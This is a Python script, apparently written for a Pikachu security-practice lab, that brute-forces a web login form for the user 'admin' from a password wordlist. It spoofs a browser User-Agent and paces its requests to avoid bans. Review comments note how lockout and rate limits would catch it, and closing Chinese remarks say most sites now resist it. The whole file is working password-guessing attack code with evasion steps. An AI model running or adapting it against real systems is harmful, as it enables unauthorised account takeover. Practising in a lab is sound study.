import requests
import time# 目标URL
# Login form of the brute-force exercise in a Pikachu practice lab on a
# private address -- replace with the actual target URL.
url = "http://192.168.3.101/pikachu/vul/burteforce/bf_form.php"

# Known username
username = "admin"

# Path of the password dictionary file
password_file = "passwords.txt"

# Spoofed browser request header, used so the requests are not blocked.
# NOTE(review): the value is one fixed Chrome 91 string sent on every attempt,
# so a run of failed logins sharing it is easy to spot in server logs.
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
}


def login_attempt(username, password):
    """Submit one username/password pair to the login form.

    A fresh ``requests.Session`` is created for every call; the form page is
    fetched first and the credentials are then POSTed to the same URL. The
    returned page is saved to ``response.txt`` (overwritten on each call) for
    debugging.

    Args:
        username: Account name placed in the ``username`` form field.
        password: Candidate password placed in the ``password`` form field.

    Returns:
        True if the lower-cased response body contains "login success",
        otherwise False.
    """
    client = requests.Session()
    # Load the form page first; the result is discarded and replaced by the
    # POST reply below.
    reply = client.get(url, headers=headers)

    # Build the form data
    form_fields = {
        'username': username,
        'password': password,
        'submit': 'Login',
    }

    # Send the POST request
    reply = client.post(url, data=form_fields, headers=headers)
    page_text = reply.text

    # Write the returned page to a file (for debugging)
    with open('response.txt', 'w', encoding='utf-8') as dump:
        dump.write(page_text)

    # Check whether the login succeeded
    succeeded = "login success" in page_text.lower()
    if not succeeded:
        print(f"[-] Incorrect password: {password}")
        return False
    print(f"[+] Password found: {password}")
    return True


# Read the password dictionary file
with open(password_file, 'r', encoding='utf-8') as wordlist:
    # Try the candidates one at a time and stop at the first accepted one.
    for raw_line in wordlist.readlines():
        candidate = raw_line.strip()

        # Attempt the login
        found = login_attempt(username, candidate)
        if found:
            break

        # Delay between requests to avoid being banned.
        # NOTE(review): a steady one-per-second series of failures against a
        # single account is what per-account lockout, failed-login rate
        # limits or a CAPTCHA on the form are meant to stop.
        time.sleep(1)
但是话说回来,这样不设防的后台已经不多了,大部分都加了验证码或者登录尝试次数的限制,所以这个脚本也没什么用处
这个不建议改多线程,小网站的话真的会被扫崩掉,大网站也有封ip的风险